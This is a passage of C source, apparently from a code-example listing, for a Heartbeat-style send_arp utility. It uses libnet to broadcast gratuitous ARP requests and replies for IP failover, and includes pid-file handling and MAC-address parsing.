	 fprintf (stderr, "%s\n", libnet_geterror (l));
      }
   }
   printf ("\n");
}
Example #30
0
int
main(int argc, char *argv[])
{
	int	c = -1;
	char	errbuf[LIBNET_ERRBUF_SIZE];
	char*	device;
	char*	ipaddr;
	char*	macaddr;
	char*	broadcast;
	char*	netmask;
	u_int32_t	ip;
	u_char  src_mac[6];
	LTYPE*	l;
	int	repeatcount = 1;
	int	j;
	long	msinterval = 1000;
	int	flag;
	char    pidfilenamebuf[64];
	char    *pidfilename = NULL;

	CL_SIGNAL(SIGTERM, byebye);
	CL_SIGINTERRUPT(SIGTERM, 1);

        cl_log_set_entity(SENDARPNAME);
        cl_log_enable_stderr(TRUE);
        cl_log_set_facility(LOG_USER);
	cl_inherit_logging_environment(0);

	while ((flag = getopt(argc, argv, "i:r:p:")) != EOF) {
		switch(flag) {

		case 'i':	msinterval= atol(optarg);
				break;

		case 'r':	repeatcount= atoi(optarg);
				break;

		case 'p':	pidfilename= optarg;
				break;

		default:	fprintf(stderr, "%s\n\n", print_usage);
				return 1;
				break;
		}
	}
	if (argc-optind != 5) {
		fprintf(stderr, "%s\n\n", print_usage);
		return 1;
	}

	/*
	 *	argv[optind+1] DEVICE		dc0,eth0:0,hme0:0,
	 *	argv[optind+2] IP		192.168.195.186
	 *	argv[optind+3] MAC ADDR		00a0cc34a878
	 *	argv[optind+4] BROADCAST	192.168.195.186
	 *	argv[optind+5] NETMASK		ffffffffffff
	 */

	device    = argv[optind];
	ipaddr    = argv[optind+1];
	macaddr   = argv[optind+2];
	broadcast = argv[optind+3];
	netmask   = argv[optind+4];

	if (!pidfilename) {
		if (snprintf(pidfilenamebuf, sizeof(pidfilenamebuf), "%s%s", 
					PIDFILE_BASE, ipaddr) >= 
				(int)sizeof(pidfilenamebuf)) {
			cl_log(LOG_INFO, "Pid file truncated");
			return EXIT_FAILURE;
		}
		pidfilename = pidfilenamebuf;
	}

	if(write_pid_file(pidfilename) < 0) {
		return EXIT_FAILURE;
	}

#if defined(HAVE_LIBNET_1_0_API)
#ifdef ON_DARWIN
	if ((ip = libnet_name_resolve((unsigned char*)ipaddr, 1)) == -1UL) {
#else
	if ((ip = libnet_name_resolve(ipaddr, 1)) == -1UL) {
#endif
		cl_log(LOG_ERR, "Cannot resolve IP address [%s]", ipaddr);
		unlink(pidfilename);
		return EXIT_FAILURE;
	}

	l = libnet_open_link_interface(device, errbuf);
	if (!l) {
		cl_log(LOG_ERR, "libnet_open_link_interface on %s: %s"
		,	device, errbuf);
		unlink(pidfilename);
		return EXIT_FAILURE;
	}
#elif defined(HAVE_LIBNET_1_1_API)
	if ((l=libnet_init(LIBNET_LINK, device, errbuf)) == NULL) {
		cl_log(LOG_ERR, "libnet_init failure on %s: %s", device, errbuf);
		unlink(pidfilename);
		return EXIT_FAILURE;
	}
	if ((signed)(ip = libnet_name2addr4(l, ipaddr, 1)) == -1) {
		cl_log(LOG_ERR, "Cannot resolve IP address [%s]", ipaddr);
		unlink(pidfilename);
		return EXIT_FAILURE;
	}
#else
#	error "Must have LIBNET API version defined."
#endif

	if (!strcasecmp(macaddr, AUTO_MAC_ADDR)) {
		if (get_hw_addr(device, src_mac) < 0) {
			 cl_log(LOG_ERR, "Cannot find mac address for %s", 
					 device);
			 unlink(pidfilename);
			 return EXIT_FAILURE;
		}
	}
	else {
		convert_macaddr((unsigned char *)macaddr, src_mac);
	}

/*
 * We need to send both a broadcast ARP request as well as the ARP response we
 * were already sending.  All the interesting research work for this fix was
 * done by Masaki Hasegawa <*****@*****.**> and his colleagues.
 */
	for (j=0; j < repeatcount; ++j) {
		c = send_arp(l, ip, (unsigned char*)device, src_mac
			, (unsigned char*)broadcast, (unsigned char*)netmask
			, ARPOP_REQUEST);
		if (c < 0) {
			break;
		}
		mssleep(msinterval / 2);
		c = send_arp(l, ip, (unsigned char*)device, src_mac
			, (unsigned char *)broadcast
			, (unsigned char *)netmask, ARPOP_REPLY);
		if (c < 0) {
			break;
		}
		if (j != repeatcount-1) {
			mssleep(msinterval / 2);
		}
	}

	unlink(pidfilename);
	return c < 0  ? EXIT_FAILURE : EXIT_SUCCESS;
}


void
convert_macaddr (u_char *macaddr, u_char enet_src[6])
{
	int i, pos;
	u_char bits[3];

	pos = 0;
	for (i = 0; i < 6; i++) {
		/* Inserted to allow old-style MAC addresses */
		if (*macaddr == ':') {
			pos++;
		}
		bits[0] = macaddr[pos++];
		bits[1] = macaddr[pos++];
		bits[2] = '\0';

		enet_src[i] = strtol((const char *)bits, (char **)NULL, 16);
	}

}